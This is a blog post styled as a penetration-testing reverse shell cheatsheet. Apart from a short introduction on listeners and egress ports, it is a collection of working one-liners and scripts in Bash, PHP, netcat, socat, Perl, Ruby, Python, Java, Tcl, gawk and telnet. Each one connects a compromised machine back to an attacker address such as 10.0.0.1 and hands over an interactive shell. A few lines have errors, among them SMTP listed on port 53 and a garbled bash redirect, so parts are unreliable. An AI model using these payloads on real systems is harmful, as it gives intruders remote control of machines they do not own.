Category Archives: pentest

Reverse Shell Cheatsheet

During penetration testing, we might be lucky enough to exploit a command execution vulnerability. Soon, we want and interactive shell to penetrate deeper. Some approach involving “login” mechanism, such as add new account / SSH key / .rhosts file. However if these approach is not viable then hop would be shell, either reverse shell or binding shell to a TCP port. As stated in title, we will discussing the former.

Below we curate reverse shells that use various programming language or tools on target machine.

Listening Home

Most network firewall egress filters allow

  • http (tcp port 80)
  • https (tcp port 443)
  • dns (tcp/udp port 53)
  • smtp (tcp port 53)
  • ping (icmp requests and echo replies)

While it’s not always be true, it can be our initial attempt to set listening socket to one of those ports. Remember that reverse shell need a “home” or something in our machine that listen and communicate with reverse shell.

The simplest trick in our disposal is using netcat to listen on socket. Most likely netcat is installed by default.

nc -vlp 13510

Or if we are using socat, we can use this.

socat READLINE,history:/tmp/history.cmds TCP4-LISTEN:13510

or we can create a redirectory on public faced machine which will give the traffic to our system.

Reverse Shell

Bash

exec 5<>/dev/tcp/10.0.0.1/13510
cat <&5 | while read line; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/10.0.0.1/13510 0>&1

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/10.0.0.1/13510; sh <&196 >&196 2>&196

TCLsh

#!/usr/bin/tclsh
set s [socket <IP> <PORT>];
while {42} {
  puts -nonewline $s "shell>";
  flush $s;
  gets $s c;
  set e "exec $c";
  if {![catch {set r [eval $e]} err]} {
    puts $s $r;
  }
  flush $s;
}
close $s;

echo 'set s [socket <IP> <PORT>];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

PHP

php -r '$sock=fsockopen("10.0.0.1",13510);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",13510);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",13510);`/bin/sh -i <&3 >&3 2>&3`;'

php -r '$sock=fsockopen("10.0.0.1",13510);system("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",13510);popen("/bin/sh -i <&3 >&3 2>&3");'

Netcat

nc -e /bin/sh 10.0.0.1 13510

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 13510 >/tmp/f

/bin/sh | nc 10.0.0.1 13510

Socat

socat TCP:10.0.0.1:13510 EXEC:/bin/bash

socat OPENSSL:10.0.0.1:13510 EXEC:/bin/bash,pty

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 0/tmp/p
telnet 10.0.0.1 80 | /bin/bash | telnet 10.0.0.1 0 443

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=13510;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

for Windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:13510");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",13510).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1","13510");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

ruby -rsocket -e "c=TCPSocket.new("10.0.0.1","13510");while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/13510;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk

#!/usr/bin/awk -f
BEGIN {
   s = "/inet/tcp/0/10.0.0.1/13510"
   while(42) {
      do{
         printf "shell>" |& s
         s |& getline c
         if(c){
            while ((c |& getline) > 0)
               print $0 |& s
            close(c)
         }
      } while(c != "exit")
      close(s)
   }
}

awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/13510"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

xterm

one of the simplest reverse shell.

xterm -display :13510

to catch incoming forms of reverse shell in xterm session

xterm -display 10.0.0.1:1
Xnest :1

 

The post Reverse Shell Cheatsheet appeared first on Xathrya.ID.